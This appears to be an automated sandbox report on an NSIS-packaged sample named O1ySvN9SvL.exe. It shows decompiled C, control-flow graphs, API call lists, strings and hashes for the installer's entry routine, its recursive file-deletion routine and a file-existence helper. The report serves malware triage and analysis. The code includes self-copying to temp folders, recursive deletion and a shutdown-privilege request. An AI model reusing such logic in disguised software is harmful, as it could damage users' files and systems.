                control_flow_graph 0 4032fa-403378 #17 OleInitialize SHGetFileInfoA call 405af4 GetCommandLineA call 405af4 GetModuleHandleA 5 403384-403399 call 405612 CharNextA 0->5 6 40337a-40337f 0->6 9 4033fe-403402 5->9 6->5 10 403404 9->10 11 40339b-40339e 9->11 14 403417-40342f GetTempPathA call 4032c6 10->14 12 4033a0-4033a4 11->12 13 4033a6-4033ae 11->13 12->12 12->13 15 4033b0-4033b1 13->15 16 4033b6-4033b9 13->16 24 403451-403468 DeleteFileA call 402c7d 14->24 25 403431-40344f GetWindowsDirectoryA lstrcatA call 4032c6 14->25 15->16 18 4033bb-4033bf 16->18 19 4033ee-4033fb call 405612 16->19 22 4033c1-4033ca 18->22 23 4033cf-4033d5 18->23 19->9 32 4033fd 19->32 22->23 27 4033cc 22->27 29 4033e5-4033ec 23->29 30 4033d7-4033e0 23->30 37 40346a-403470 24->37 38 4034cf-4034de ExitProcess OleUninitialize 24->38 25->24 25->38 27->23 29->19 35 403406-403412 call 405af4 29->35 30->29 34 4033e2 30->34 32->9 34->29 35->14 40 403472-40347b call 405612 37->40 41 4034bf-4034c6 call 4036a1 37->41 42 4034e4-4034f4 call 4053c2 ExitProcess 38->42 43 4035c9-4035cf 38->43 56 403486-403488 40->56 50 4034cb 41->50 47 4035d1-4035ee call 405dda * 3 43->47 48 40364c-403654 43->48 71 4035f0-4035f2 47->71 72 403638-403643 ExitWindowsEx 47->72 52 403656 48->52 53 40365a-40365e ExitProcess 48->53 50->38 52->53 58 40348a-403494 56->58 59 40347d-403483 56->59 62 403496-4034a3 call 4056c8 58->62 63 4034fa-403514 lstrcatA lstrcmpiA 58->63 59->58 61 403485 59->61 61->56 62->38 74 4034a5-4034bb call 405af4 * 2 62->74 63->38 65 403516-40352b CreateDirectoryA SetCurrentDirectoryA 63->65 68 403538-403552 call 405af4 65->68 69 40352d-403533 call 405af4 65->69 83 403557-403573 call 405b16 DeleteFileA 68->83 69->68 71->72 77 4035f4-4035f6 71->77 72->48 76 403645-403647 call 40140b 72->76 74->41 76->48 77->72 81 4035f8-40360a GetCurrentProcess 77->81 81->72 91 40360c-40362e 81->91 89 4035b4-4035bb 83->89 90 403575-403585 CopyFileA 83->90 89->83 93 4035bd-4035c4 call 405842 89->93 90->89 92 403587-4035a7 call 405842 call 405b16 call 405361 90->92 91->72 92->89 103 4035a9-4035b0 CloseHandle 92->103 93->38 103->89
                C-Code - Quality: 68%
                			_entry_() {
				struct _SHFILEINFOA _v356;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v392;
				int _v396;
				int _v400;
				signed int _v404;
				CHAR* _v408;
				int _v412;
				intOrPtr _v416;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				intOrPtr _t34;
				CHAR* _t38;
				char* _t41;
				signed int _t43;
				void* _t47;
				int _t49;
				signed int _t50;
				signed int _t53;
				int _t54;
				signed int _t58;
				intOrPtr _t69;
				intOrPtr _t75;
				void* _t77;
				void* _t87;
				void* _t89;
				char* _t94;
				signed int _t95;
				void* _t96;
				signed int _t97;
				signed int _t98;
				signed int _t101;
				CHAR* _t103;
				signed int _t104;
				void* _t105;
				intOrPtr _t111;
				char _t118;

				_t105 =  &_v384;
				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t97 = 0;
				_v380 = 0x20;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x423fd4 = _t34;
				SHGetFileInfoA(0x41f4e8, 0,  &_v356, 0x160, 0); // executed
				E00405AF4("xwkwrbeiqiuu Setup", "NSIS Error");
				_t38 = GetCommandLineA();
				_t94 = "\"C:\\Users\\alfons\\Desktop\\O1ySvN9SvL.exe\" ";
				E00405AF4(_t94, _t38);
				 *0x423f20 = GetModuleHandleA(0);
				_t41 = _t94;
				if("\"C:\\Users\\alfons\\Desktop\\O1ySvN9SvL.exe\" " == 0x22) {
					_v404 = 0x22;
					_t41 =  &M00429001;
				}
				_t43 = CharNextA(E00405612(_t41, _v404));
				_v404 = _t43;
				while(1) {
					_t89 =  *_t43;
					_t107 = _t89;
					if(_t89 == 0) {
						break;
					}
					__eflags = _t89 - 0x20;
					if(_t89 != 0x20) {
						L5:
						__eflags =  *_t43 - 0x22;
						_v404 = 0x20;
						if( *_t43 == 0x22) {
							_t43 = _t43 + 1;
							__eflags = _t43;
							_v404 = 0x22;
						}
						__eflags =  *_t43 - 0x2f;
						if( *_t43 != 0x2f) {
							L15:
							_t43 = E00405612(_t43, _v404);
							__eflags =  *_t43 - 0x22;
							if(__eflags == 0) {
								_t43 = _t43 + 1;
								__eflags = _t43;
							}
							continue;
						} else {
							_t43 = _t43 + 1;
							__eflags =  *_t43 - 0x53;
							if( *_t43 == 0x53) {
								__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
								if(( *(_t43 + 1) | 0x00000020) == 0x20) {
									_t97 = _t97 | 0x00000002;
									__eflags = _t97;
								}
							}
							__eflags =  *_t43 - 0x4352434e;
							if( *_t43 == 0x4352434e) {
								__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
								if(( *(_t43 + 4) | 0x00000020) == 0x20) {
									_t97 = _t97 | 0x00000004;
									__eflags = _t97;
								}
							}
							__eflags =  *((intOrPtr*)(_t43 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t43 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t43 - 2)) = 0;
								_t44 = _t43 + 2;
								__eflags = _t43 + 2;
								E00405AF4("C:\\Users\\alfons\\AppData\\Local\\Temp", _t44);
								L20:
								_t103 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t103);
								_t47 = E004032C6(_t107);
								_t108 = _t47;
								if(_t47 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t49 = E00402C7D(_t109, _t97); // executed
									_v412 = _t49;
									if(_t49 != 0) {
										L32:
										ExitProcess(); // executed
										__imp__OleUninitialize(); // executed
										if(_v404 == 0) {
											__eflags =  *0x423fb4; // 0x0
											if(__eflags != 0) {
												_t104 = E00405DDA(3);
												_t98 = E00405DDA(4);
												_t53 = E00405DDA(5);
												__eflags = _t104;
												_t95 = _t53;
												if(_t104 != 0) {
													__eflags = _t98;
													if(_t98 != 0) {
														__eflags = _t95;
														if(_t95 != 0) {
															_t58 =  *_t104(GetCurrentProcess(), 0x28,  &_v392);
															__eflags = _t58;
															if(_t58 != 0) {
																 *_t98(0, "SeShutdownPrivilege",  &_v396);
																_v412 = 1;
																_v400 = 2;
																 *_t95(_v416, 0,  &_v412, 0, 0, 0);
															}
														}
													}
												}
												_t54 = ExitWindowsEx(2, 0);
												__eflags = _t54;
												if(_t54 == 0) {
													E0040140B(9);
												}
											}
											_t50 =  *0x423fcc; // 0xffffffff
											__eflags = _t50 - 0xffffffff;
											if(_t50 != 0xffffffff) {
												_v396 = _t50;
											}
											ExitProcess(_v396);
										}
										E004053C2(_v404, 0x200010);
										ExitProcess(2);
									}
									_t111 =  *0x423f34; // 0x0
									if(_t111 == 0) {
										L31:
										 *0x423fcc =  *0x423fcc | 0xffffffff;
										_v400 = E004036A1();
										goto L32;
									}
									_t101 = E00405612(_t94, 0);
									while(_t101 >= _t94) {
										__eflags =  *_t101 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t101 = _t101 - 1;
										__eflags = _t101;
									}
									_t113 = _t101 - _t94;
									_v408 = "Error launching installer";
									if(_t101 < _t94) {
										lstrcatA(_t103, "~nsu.tmp");
										_t99 = "C:\\Users\\alfons\\Desktop";
										if(lstrcmpiA(_t103, "C:\\Users\\alfons\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t103, 0);
										SetCurrentDirectoryA(_t103);
										_t118 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
										if(_t118 == 0) {
											E00405AF4("C:\\Users\\alfons\\AppData\\Local\\Temp", _t99);
										}
										E00405AF4(0x424000, _v396);
										 *0x424400 = 0x41;
										_t96 = 0x1a;
										do {
											_t69 =  *0x423f28; // 0x74d188
											_push( *((intOrPtr*)(_t69 + 0x120)));
											_push(0x41f0e8);
											E00405B16(0, _t96, 0x41f0e8);
											DeleteFileA(0x41f0e8);
											if(_v416 != 0 && CopyFileA("C:\\Users\\alfons\\Desktop\\O1ySvN9SvL.exe", 0x41f0e8, 1) != 0) {
												_push(0);
												_push(0x41f0e8);
												E00405842();
												_t75 =  *0x423f28; // 0x74d188
												_push( *((intOrPtr*)(_t75 + 0x124)));
												_push(0x41f0e8);
												E00405B16(0, _t96, 0x41f0e8);
												_t77 = E00405361(0x41f0e8);
												if(_t77 != 0) {
													CloseHandle(_t77);
													 *((intOrPtr*)(_t105 + 0x10)) = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t96 = _t96 - 1;
										} while (_t96 != 0);
										_push(0);
										_push(_t103);
										E00405842();
										goto L32;
									}
									 *_t101 = 0;
									_t102 = _t101 + 4;
									if(E004056C8(_t113, _t101 + 4) == 0) {
										goto L32;
									}
									E00405AF4("C:\\Users\\alfons\\AppData\\Local\\Temp", _t102);
									E00405AF4("C:\\Users\\alfons\\AppData\\Local\\Temp", _t102);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t103, 0x3fb);
								lstrcatA(_t103, "\\Temp");
								_t87 = E004032C6(_t108);
								_t109 = _t87;
								if(_t87 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t43 = _t43 + 1;
						__eflags =  *_t43 - 0x20;
					} while ( *_t43 == 0x20);
					goto L5;
				}
				goto L20;
			}










































                0x004032fa
                0x00403306
                0x0040330a
                0x00403312
                0x00403314
                0x00403319
                0x00403320
                0x00403326
                0x0040333c
                0x0040334c
                0x00403351
                0x00403357
                0x0040335e
                0x00403371
                0x00403376
                0x00403378
                0x0040337a
                0x0040337f
                0x0040337f
                0x0040338f
                0x00403395
                0x004033fe
                0x004033fe
                0x00403400
                0x00403402
                0x00000000
                0x00000000
                0x0040339b
                0x0040339e
                0x004033a6
                0x004033a6
                0x004033a9
                0x004033ae
                0x004033b0
                0x004033b0
                0x004033b1
                0x004033b1
                0x004033b6
                0x004033b9
                0x004033ee
                0x004033f3
                0x004033f8
                0x004033fb
                0x004033fd
                0x004033fd
                0x004033fd
                0x00000000
                0x004033bb
                0x004033bb
                0x004033bc
                0x004033bf
                0x004033c7
                0x004033ca
                0x004033cc
                0x004033cc
                0x004033cc
                0x004033ca
                0x004033cf
                0x004033d5
                0x004033dd
                0x004033e0
                0x004033e2
                0x004033e2
                0x004033e2
                0x004033e0
                0x004033e5
                0x004033ec
                0x00403406
                0x00403409
                0x00403409
                0x00403412
                0x00403417
                0x00403417
                0x00403422
                0x00403428
                0x0040342d
                0x0040342f
                0x00403451
                0x00403456
                0x0040345d
                0x00403464
                0x00403468
                0x004034cf
                0x004034cf
                0x004034d4
                0x004034de
                0x004035c9
                0x004035cf
                0x004035da
                0x004035e3
                0x004035e5
                0x004035ea
                0x004035ec
                0x004035ee
                0x004035f0
                0x004035f2
                0x004035f4
                0x004035f6
                0x00403606
                0x00403608
                0x0040360a
                0x00403617
                0x00403626
                0x0040362e
                0x00403636
                0x00403636
                0x0040360a
                0x004035f6
                0x004035f2
                0x0040363b
                0x00403641
                0x00403643
                0x00403647
                0x00403647
                0x00403643
                0x0040364c
                0x00403651
                0x00403654
                0x00403656
                0x00403656
                0x0040365e
                0x0040365e
                0x004034ed
                0x004034f4
                0x004034f4
                0x0040346a
                0x00403470
                0x004034bf
                0x004034bf
                0x004034cb
                0x00000000
                0x004034cb
                0x00403479
                0x00403486
                0x0040347d
                0x00403483
                0x00000000
                0x00000000
                0x00403485
                0x00403485
                0x00403485
                0x0040348a
                0x0040348c
                0x00403494
                0x00403500
                0x00403505
                0x00403514
                0x00000000
                0x00000000
                0x00403518
                0x0040351f
                0x00403525
                0x0040352b
                0x00403533
                0x00403533
                0x00403541
                0x00403548
                0x00403551
                0x00403557
                0x00403557
                0x0040355c
                0x00403562
                0x00403563
                0x00403569
                0x00403573
                0x00403587
                0x00403588
                0x00403589
                0x0040358e
                0x00403593
                0x00403599
                0x0040359a
                0x004035a0
                0x004035a7
                0x004035aa
                0x004035b0
                0x004035b0
                0x004035a7
                0x004035b4
                0x004035ba
                0x004035ba
                0x004035bd
                0x004035be
                0x004035bf
                0x00000000
                0x004035bf
                0x00403496
                0x00403498
                0x004034a3
                0x00000000
                0x00000000
                0x004034ab
                0x004034b6
                0x004034bb
                0x00000000
                0x004034bb
                0x00403437
                0x00403443
                0x00403448
                0x0040344d
                0x0040344f
                0x00000000
                0x00000000
                0x00000000
                0x0040344f
                0x00000000
                0x004033ec
                0x00000000
                0x00000000
                0x00000000
                0x004033a0
                0x004033a0
                0x004033a0
                0x004033a1
                0x004033a1
                0x00000000
                0x004033a0
                0x00000000

                APIs
                • #17.COMCTL32 ref: 00403319
                • OleInitialize.OLE32(00000000), ref: 00403320
                • SHGetFileInfoA.SHELL32(0041F4E8,00000000,?,00000160,00000000), ref: 0040333C
                  • Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,xwkwrbeiqiuu Setup,NSIS Error), ref: 00405B01
                • GetCommandLineA.KERNEL32(xwkwrbeiqiuu Setup,NSIS Error), ref: 00403351
                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,00000000), ref: 00403364
                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,00000020), ref: 0040338F
                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403422
                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403437
                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403443
                • DeleteFileA.KERNELBASE(1033), ref: 00403456
                • ExitProcess.KERNEL32(00000000), ref: 004034CF
                • OleUninitialize.OLE32(00000000), ref: 004034D4
                • ExitProcess.KERNEL32 ref: 004034F4
                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,00000000,00000000), ref: 00403500
                • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,00000000,00000000), ref: 0040350C
                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403518
                • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040351F
                • DeleteFileA.KERNEL32(0041F0E8,0041F0E8,?,00424000,?), ref: 00403569
                • CopyFileA.KERNEL32 ref: 0040357D
                • CloseHandle.KERNEL32(00000000,0041F0E8,0041F0E8,?,0041F0E8,00000000), ref: 004035AA
                • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004035FF
                • ExitWindowsEx.USER32(00000002,00000000), ref: 0040363B
                • ExitProcess.KERNEL32 ref: 0040365E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: ExitFileProcess$Directory$CurrentDeleteHandleWindowslstrcat$CharCloseCommandCopyCreateInfoInitializeLineModuleNextPathTempUninitializelstrcmpilstrcpyn
                • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\O1ySvN9SvL.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\O1ySvN9SvL.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$xwkwrbeiqiuu Setup$~nsu.tmp
                • API String ID: 3411505140-3907866466
                • Opcode ID: 462f336be7425baa29b142cb7ae5a0ad3fe5dbea02ff1f081f28f080f31ceddd
                • Instruction ID: 185554a669e391af13640c5e948e6a5ed170759bbde9d6c9181f60cdac0bc0dd
                • Opcode Fuzzy Hash: 462f336be7425baa29b142cb7ae5a0ad3fe5dbea02ff1f081f28f080f31ceddd
                • Instruction Fuzzy Hash: 2691E330A08341BED7216F619D49B2B7EACEB44306F44093BF541B62E2C77C9E058B6E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405426 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 152filestringCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 349 405426-405443 call 4056c8 352 405445-405457 DeleteFileA 349->352 353 40545c-405464 349->353 354 4055e1-4055e4 352->354 355 405466-405468 353->355 356 405477-405487 call 405af4 353->356 357 40558c-405592 355->357 358 40546e-405471 355->358 362 405496-405497 call 40562e 356->362 363 405489-405494 lstrcatA 356->363 357->354 361 405594-405597 357->361 358->356 358->357 364 4055a1-4055a9 call 405d9c 361->364 365 405599-40559f 361->365 366 40549c-4054c5 lstrcatA lstrlenA FindFirstFileA 362->366 363->366 364->354 374 4055ab-4055c0 call 4055e7 call 4057ac RemoveDirectoryA 364->374 365->354 369 405582-405586 366->369 370 4054cb-4054e2 call 405612 366->370 369->357 372 405588 369->372 378 4054e4-4054e8 370->378 379 4054ed-4054f0 370->379 372->357 389 4055c2-4055c6 374->389 390 4055d9-4055dc call 404e9f 374->390 378->379 381 4054ea 378->381 382 4054f2-4054f7 379->382 383 405503-405511 call 405af4 379->383 381->379 386 405561-405573 FindNextFileA 382->386 387 4054f9-4054fb 382->387 394 405513-40551b 383->394 395 405528-405537 call 4057ac DeleteFileA 383->395 386->370 392 405579-40557c FindClose 386->392 387->383 388 4054fd-405501 387->388 388->383 388->386 389->365 393 4055c8-4055d7 call 404e9f call 405842 389->393 390->354 392->369 393->354 394->386 398 40551d-405526 call 405426 394->398 405 405559-40555c call 404e9f 395->405 406 405539-40553d 395->406 398->386 405->386 409 405551-405557 406->409 410 40553f-40554f call 404e9f call 405842 406->410 409->386 410->386
                C-Code - Quality: 94%
                			E00405426(void* __edi, void* __eflags, signed int _a4, signed int _a8) {
				void* _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t38;
				char* _t50;
				signed int _t53;
				signed int _t56;
				signed int _t62;
				signed int _t64;
				void* _t66;
				CHAR* _t67;
				signed char _t68;
				CHAR* _t71;
				char* _t75;

				_t67 = _a4;
				_t38 = E004056C8(__eflags, _t67);
				_t68 = _a8;
				_v12 = _t38;
				if((_t68 & 0x00000008) != 0) {
					_t64 = DeleteFileA(_t67); // executed
					asm("sbb eax, eax");
					_t66 =  ~_t64 + 1;
					 *0x423fa8 =  *0x423fa8 + _t66;
					return _t66;
				}
				_a4 = _t68;
				_t7 =  &_a4;
				 *_t7 = _a4 & 0x00000001;
				__eflags =  *_t7;
				if( *_t7 == 0) {
					L5:
					E00405AF4(0x421538, _t67);
					__eflags = _a4;
					if(_a4 == 0) {
						E0040562E(_t67);
					} else {
						lstrcatA(0x421538, "\*.*");
					}
					lstrcatA(_t67, 0x409010);
					_t71 =  &(_t67[lstrlenA(_t67)]); // executed
					_t38 = FindFirstFileA(0x421538,  &_v332); // executed
					__eflags = _t38 - 0xffffffff;
					_v8 = _t38;
					if(_t38 == 0xffffffff) {
						L26:
						__eflags = _a4;
						if(_a4 != 0) {
							_t32 = _t71 - 1;
							 *_t32 =  *(_t71 - 1) & 0x00000000;
							__eflags =  *_t32;
						}
						goto L28;
					} else {
						goto L9;
					}
					do {
						L9:
						_t75 =  &(_v332.cFileName);
						_t50 = E00405612( &(_v332.cFileName), 0x3f);
						__eflags =  *_t50;
						if( *_t50 != 0) {
							__eflags = _v332.cAlternateFileName;
							if(_v332.cAlternateFileName != 0) {
								_t75 =  &(_v332.cAlternateFileName);
							}
						}
						__eflags =  *_t75 - 0x2e;
						if( *_t75 != 0x2e) {
							L16:
							E00405AF4(_t71, _t75);
							__eflags = _v332.dwFileAttributes & 0x00000010;
							if((_v332.dwFileAttributes & 0x00000010) == 0) {
								E004057AC(_t67);
								_t53 = DeleteFileA(_t67);
								__eflags = _t53;
								if(_t53 != 0) {
									E00404E9F(0xfffffff2, _t67);
								} else {
									__eflags = _a8 & 0x00000004;
									if((_a8 & 0x00000004) == 0) {
										 *0x423fa8 =  *0x423fa8 + 1;
									} else {
										E00404E9F(0xfffffff1, _t67);
										_push(0);
										_push(_t67);
										E00405842();
									}
								}
							} else {
								__eflags = (_a8 & 0x00000003) - 3;
								if(__eflags == 0) {
									E00405426(_t71, __eflags, _t67, _a8);
								}
							}
							goto L24;
						}
						_t62 =  *((intOrPtr*)(_t75 + 1));
						__eflags = _t62;
						if(_t62 == 0) {
							goto L24;
						}
						__eflags = _t62 - 0x2e;
						if(_t62 != 0x2e) {
							goto L16;
						}
						__eflags =  *((char*)(_t75 + 2));
						if( *((char*)(_t75 + 2)) == 0) {
							goto L24;
						}
						goto L16;
						L24:
						_t56 = FindNextFileA(_v8,  &_v332); // executed
						__eflags = _t56;
					} while (_t56 != 0);
					_t38 = FindClose(_v8); // executed
					goto L26;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00405D9C(_t67);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E004055E7(_t67);
							E004057AC(_t67);
							_t38 = RemoveDirectoryA(_t67); // executed
							__eflags = _t38;
							if(_t38 != 0) {
								return E00404E9F(0xffffffe5, _t67);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L30;
							}
							E00404E9F(0xfffffff1, _t67);
							_push(0);
							_push(_t67);
							return E00405842();
						}
						L30:
						 *0x423fa8 =  *0x423fa8 + 1;
						return _t38;
					}
					__eflags = _t68 & 0x00000002;
					if((_t68 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

















                0x00405430
                0x00405435
                0x0040543a
                0x0040543d
                0x00405443
                0x00405446
                0x0040544e
                0x00405450
                0x00405451
                0x00000000
                0x00405451
                0x0040545c
                0x00405460
                0x00405460
                0x00405460
                0x00405464
                0x00405477
                0x0040547e
                0x00405483
                0x00405487
                0x00405497
                0x00405489
                0x0040548f
                0x0040548f
                0x004054a2
                0x004054b7
                0x004054b9
                0x004054bf
                0x004054c2
                0x004054c5
                0x00405582
                0x00405582
                0x00405586
                0x00405588
                0x00405588
                0x00405588
                0x00405588
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004054cb
                0x004054cb
                0x004054d4
                0x004054da
                0x004054df
                0x004054e2
                0x004054e4
                0x004054e8
                0x004054ea
                0x004054ea
                0x004054e8
                0x004054ed
                0x004054f0
                0x00405503
                0x00405505
                0x0040550a
                0x00405511
                0x00405529
                0x0040552f
                0x00405535
                0x00405537
                0x0040555c
                0x00405539
                0x00405539
                0x0040553d
                0x00405551
                0x0040553f
                0x00405542
                0x00405547
                0x00405549
                0x0040554a
                0x0040554a
                0x0040553d
                0x00405513
                0x00405519
                0x0040551b
                0x00405521
                0x00405521
                0x0040551b
                0x00000000
                0x00405511
                0x004054f2
                0x004054f5
                0x004054f7
                0x00000000
                0x00000000
                0x004054f9
                0x004054fb
                0x00000000
                0x00000000
                0x004054fd
                0x00405501
                0x00000000
                0x00000000
                0x00000000
                0x00405561
                0x0040556b
                0x00405571
                0x00405571
                0x0040557c
                0x00000000
                0x00405466
                0x00405466
                0x00405468
                0x0040558c
                0x0040558f
                0x00405592
                0x004055e4
                0x004055e4
                0x004055e4
                0x00405594
                0x00405597
                0x004055a2
                0x004055a7
                0x004055a9
                0x00000000
                0x00000000
                0x004055ac
                0x004055b2
                0x004055b8
                0x004055be
                0x004055c0
                0x00000000
                0x004055dc
                0x004055c2
                0x004055c6
                0x00000000
                0x00000000
                0x004055cb
                0x004055d0
                0x004055d1
                0x00000000
                0x004055d2
                0x00405599
                0x00405599
                0x00000000
                0x00405599
                0x0040546e
                0x00405471
                0x00000000
                0x00000000
                0x00000000
                0x00405471

                APIs
                • DeleteFileA.KERNELBASE(?,?,76DDF560,00000000), ref: 00405446
                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm4D7E.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsm4D7E.tmp\*.*,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,?,76DDF560,00000000), ref: 0040548F
                • lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nsm4D7E.tmp\*.*,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,?,76DDF560,00000000), ref: 004054A2
                • lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsm4D7E.tmp\*.*,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,?,76DDF560,00000000), ref: 004054A8
                • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsm4D7E.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsm4D7E.tmp\*.*,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,?,76DDF560,00000000), ref: 004054B9
                • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 0040556B
                • FindClose.KERNELBASE(?), ref: 0040557C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                • String ID: "C:\Users\user\Desktop\O1ySvN9SvL.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsm4D7E.tmp\*.*$\*.*
                • API String ID: 2035342205-2994364368
                • Opcode ID: 178659d5dd2b5e4005abbb3c6ac50f0bcaef0d38e253c4ce23e3dec6c8ab0d63
                • Instruction ID: 72c9b9ae93c356e5fbaabc5fff99037f1728fc53f432d7f95e6e75a23a32325d
                • Opcode Fuzzy Hash: 178659d5dd2b5e4005abbb3c6ac50f0bcaef0d38e253c4ce23e3dec6c8ab0d63
                • Instruction Fuzzy Hash: C941D070804A087ACB21AB358C85BEF3A6DDF01355F14847BB846B61D6C63C9E81CEAD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24fileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 582 405d9c-405dc5 SetErrorMode FindFirstFileA SetErrorMode 583 405dd2 582->583 584 405dc7-405dd0 FindClose 582->584 585 405dd4-405dd7 583->585 584->585
                C-Code - Quality: 100%
                			E00405D9C(CHAR* _a4) {
				void* _t3;
				void* _t8;

				SetErrorMode(0x8001); // executed
				_t3 = FindFirstFileA(_a4, 0x422580); // executed
				_t8 = _t3; // executed
				SetErrorMode(0); // executed
				if(_t8 == 0xffffffff) {
					return 0;
				}
				FindClose(_t8); // executed
				return 0x422580;
			}





                0x00405daa
                0x00405db6
                0x00405dbe
                0x00405dc0
                0x00405dc5
                0x00000000
                0x00405dd2
                0x00405dc8
                0x00000000

                APIs
                • SetErrorMode.KERNELBASE(00008001,00000000,C:\,?,0040570B,C:\,C:\,00000000,C:\,C:\,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,76DDF560,0040543A,?,76DDF560), ref: 00405DAA
                • FindFirstFileA.KERNELBASE(?,00422580), ref: 00405DB6
                • SetErrorMode.KERNELBASE(00000000), ref: 00405DC0
                • FindClose.KERNELBASE(00000000), ref: 00405DC8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
